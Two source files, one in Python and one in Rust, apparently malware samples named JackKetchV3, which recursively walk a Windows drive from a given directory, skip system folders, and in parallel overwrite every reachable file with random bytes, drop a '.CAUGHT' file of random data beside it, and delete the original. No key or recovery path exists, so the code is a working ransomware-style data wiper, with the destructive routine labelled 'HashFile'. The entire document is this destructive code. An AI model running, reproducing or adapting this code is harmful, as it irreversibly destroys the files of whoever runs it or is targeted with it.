File: samples/Version_3/JackKetchV3.py
import os
import sys
import time
import threading
import multiprocessing
class EncryptionHandleProcesses():
    def HandleProcesses(self):
        while self.run is True:
            to_remove = []
            for i in range(len(self.processes)):
                with self.lock:
                    if self.processes[i].is_alive():
                        pass
                    else:
                        self.processes[i].join()
                        to_remove.append(self.processes[i])
            if len(to_remove) > 0:
                for process in to_remove:
                    self.processes.remove(process)
            else:
                time.sleep(0.2)
    def RunProcess(self):
        while self.run is True:
            while len(self.pool) > 0 and len(self.processes) < self.process_limit:
                with self.lock:
                    handle = multiprocessing.Process(target=self.encryptor.DiveIntoFiles, args=(self.pool[0],))
                    handle.start()
                    self.processes.append(handle)
                    self.pool.pop(0)
    def AddToPool(self, task:list):
        with self.lock:
            self.pool.append(task)
    def AtEnd(self):
        if len(self.pool) == 0 and len(self.processes) == 0:
            self.run = False
            self.handle_pool_thread.join()
            self.handle_processes_thread.join()
            return True
        return False
    def __init__(self, process_limit:int):
        self.process_limit = process_limit
        self.run = True
        self.lock = multiprocessing.Lock()
        self.pool = []
        self.processes = []
        self.handle_processes_thread = threading.Thread(target=self.HandleProcesses, args=(()))
        self.handle_processes_thread.start()
        self.handle_pool_thread = threading.Thread(target=self.RunProcess, args=(()))
        self.handle_pool_thread.start()
        self.encryptor = Encryptors()
class Encryptors():
    def DiveIntoFiles(self, files:list):
        threads = []
        for file_path in files:
            thread_handle = threading.Thread(target=self.HashFile, args=(file_path,))
            thread_handle.start()
            threads.append(thread_handle)
        while len(threads) > 0:
            remove_list = []
            for thread in threads:
                if thread.is_alive():
                    pass
                else:
                    thread.join()
                    remove_list.append(thread)
            for thread in remove_list:
                threads.remove(thread)
    def HashFile(self, file_path:str):
        try:
            with open(f"{file_path}.CAUGHT", 'wb') as file:
                file.write(os.urandom(100))
                file.close()
        except FileExistsError:
            pass
        except FileNotFoundError:
            pass
        with open(file_path, 'wb') as file:
            file.write(os.urandom(100))
            file.close()
        with open(file_path, 'wb') as file:
            file.write(os.urandom(10))
            file.close()
        os.remove(file_path)
def DiveIntoDrive(target_directory:str):
    handler = EncryptionHandleProcesses(int(os.cpu_count() * 1.5))
    file_count = 0
    to_scan = [target_directory]
    while True:
        items = []
        for item in to_scan:
            files = []
            try:
                with os.scandir(item) as dir:
                    for entry in dir:
                        try:
                            path = ""
                            if item[-1] != "\\":
                                path = f"{item}\\{entry.name}"
                            else:
                                path = f"{item}{entry.name}"
                            if path not in ("C:\\Windows", "C:\\Users\\Public", "C:\\Users\\Default", "C:\\Users\\Default User", "C:\\bootmgr", "C:\\BCD", "C:\\pagefile.sys", 
                                        "C:\\hiberfil.sys", "C:\\Program Files", "C:\\$WINDOWS.~BT", "C:\\System Volume Information") and 'python' not in path:
                                if entry.is_dir() and path:
                                    to_scan.append(path)
                                else:
                                    file_count += 1
                                    files.append(path)
                        except FileNotFoundError:
                            pass
                handler.AddToPool(files)
            except PermissionError as error:
                pass
            except FileNotFoundError as error:
                pass
            for item in items:
                to_scan.remove(item)
        break
    while handler.AtEnd() is False:
        time.sleep(0.05)
    return file_count
if __name__ == '__main__':
    count = DiveIntoDrive(sys.argv[1])

File: samples/Version_3/JackKetchV3.rs
use std::env;
use std::io::Write;
use rand::prelude::*;
use std::time::Instant;
use std::fs::{self, File, OpenOptions};
use std::path::{PathBuf, Path};
use std::thread::{self, JoinHandle, available_parallelism};

const EROR_HEAD:&str = "[!] ";
const INFO_HEAD:&str = "[i] ";
const MISC_HEAD:&str = "[*] ";
const IMPT_HEAD:&str = "[#] ";

fn HashFile(file: &PathBuf)
{
    let path_str: &str = file.as_path().to_str().unwrap();
    let mut new_data: [u8; 100] = [0u8; 100];
    let new_str: String = format!("{}{}", path_str, ".CAUGHT");
    let new_path: &Path = Path::new(new_str.as_str());
    match OpenOptions::new().write(true).read(false).open(file)
    {
        Ok(mut file_handle) => {
            let mut rng: ThreadRng = rand::rng();
            for _i in 0..4
            {
                rng.fill(&mut new_data);
                if new_data == [0u8; 100]
                {
                    println!("{}Failed to write new data to buffer!", EROR_HEAD);
                } else {
                    match file_handle.write(&new_data)
                    {
                        Ok(_) => {
                            let _ = file_handle.flush();
                            continue;
                        },
                        Err(error) => {
                            println!("{}Failed to write to {:?}, error: {:?}", EROR_HEAD, path_str, error);
                            break;
                        }
                    }
                }
                new_data = [0u8; 100];
            }
            let _ = drop(file_handle);
            match File::create_new(new_path)
            {
                Ok(mut file) => {
                    for _i in 0..4
                    {
                        rng.fill(&mut new_data);
                        if new_data == [0u8; 100]
                        {
                            println!("{}Failed to write data to buffer!", EROR_HEAD);
                        } else {
                            match file.write_all(&new_data)
                            {
                                Ok(_) => {
                                    continue;
                                },
                                Err(_) => {
                                    println!("{}Failed to write new data to {:?}.", EROR_HEAD, new_str);
                                    break;
                                }
                            }
                        }
                    }
                },
                Err(error) => {
                    println!("{}Failed to create new file for holding data, error: {:?}", EROR_HEAD, error);
                }
            }
        },
        Err(error) => {
            println!("{}Failed to create file handle, error: {:?}", EROR_HEAD, error);
        }
    }
}

fn HashFiles(files: Vec<PathBuf>)
{
    for file in files.iter()
    {
        HashFile(file);
        match fs::remove_file(&file)
        {
            Ok(_) => {
                continue;
            },
            Err(error) => {
                println!("{}Failed to remove file {:?}, error code: {:?}", EROR_HEAD, file.to_str(), error);
            }
        }
    }
}

fn main()
{
    println!("{}Start of program.", IMPT_HEAD);
    let args: Vec<String> = env::args().collect();
    if args.len() != 2
    {
        println!("{}End of program.", IMPT_HEAD);
        return ();
    }
    let mut folders_to_search: Vec<PathBuf> = Vec::with_capacity(100000);
    let mut add_buffer: Vec<PathBuf> = Vec::with_capacity(1000);
    let mut files: Vec<PathBuf> = Vec::with_capacity(100000);
    let mut thread_groups: Vec<JoinHandle<()>> = Vec::new();
    let cpu_count: usize = available_parallelism().unwrap().get();
    let amount_per_thread: usize;
    let mut last_itteration: usize = 0;
    let banned_items: [&str; 9] = ["C:\\Windows", "C:\\Users\\Public", "C:\\Users\\Default",
    "C:\\bootmgr", "C:\\BCD", "C:\\pagefile.sys", "C:\\hiberfil.sys", "C:\\Program Files", "$WINDOWS.~BT"];
    folders_to_search.push(PathBuf::from(&args[1]));
    println!("{}Getting file paths...", MISC_HEAD);
    let now = Instant::now();
    while folders_to_search.len() > 0
    {
        for directory in folders_to_search.iter()
        {
            match fs::read_dir(&directory)
            {
                Ok(items) => {
                    for item in items
                    {
                        if let Ok(entry) = item
                        {
                            let entry_path: PathBuf = entry.path();
                            if !(banned_items.contains(&entry_path.to_str().unwrap()))
                            {
                                if entry_path.is_dir()
                                {
                                    add_buffer.push(PathBuf::from(entry_path));
                                } else {
                                    files.push(PathBuf::from(entry_path));
                                }
                            }
                        }
                    }
                },
                Err(error) => {
                    println!("{}Failed to read directory {:?}, with error; {}", EROR_HEAD, directory, error);
                }
            }
        }
        folders_to_search.clear();
        folders_to_search.append(&mut add_buffer);
        add_buffer.clear();
    }
    println!("{}Found {:?} files in {:?}", INFO_HEAD, files.len(), now.elapsed());
    println!("{}Organizing files into thread groups...", INFO_HEAD);
    let mut thread_info: Vec<Vec<PathBuf>> = Vec::new();
    let mut remove_list: Vec<usize> = Vec::new();
    amount_per_thread = files.len() / cpu_count;
    for _i in 0..cpu_count
    {
        let mut file_group: Vec<PathBuf> = Vec::new();
        for i in last_itteration..(last_itteration + amount_per_thread)
        {
            file_group.push(files[i].clone());
        }
        last_itteration += amount_per_thread;
        thread_info.push(file_group);
    }
    println!("{}Created {:?} thread groups...", MISC_HEAD, thread_info.len());
    println!("{}Adding thread data to live threads...", MISC_HEAD);
    for i in thread_info.clone()
    {
        thread_groups.push(thread::spawn(move || {
            HashFiles(i.to_owned());
        }));
    }
    while !thread_groups.is_empty()
    {
        let mut itterator: usize = 0;
        for handle in thread_groups.iter()
        {
            if handle.is_finished()
            {
                remove_list.push(itterator);
            }
            itterator += 1;
        }
        for i in remove_list.iter()
        {
            thread_groups.remove(*i);
        }
        remove_list.clear();
    }
    println!("{}Took {:?} to run full file.", INFO_HEAD, now.elapsed());
    println!("{}End of program.", IMPT_HEAD);
    return ();
}
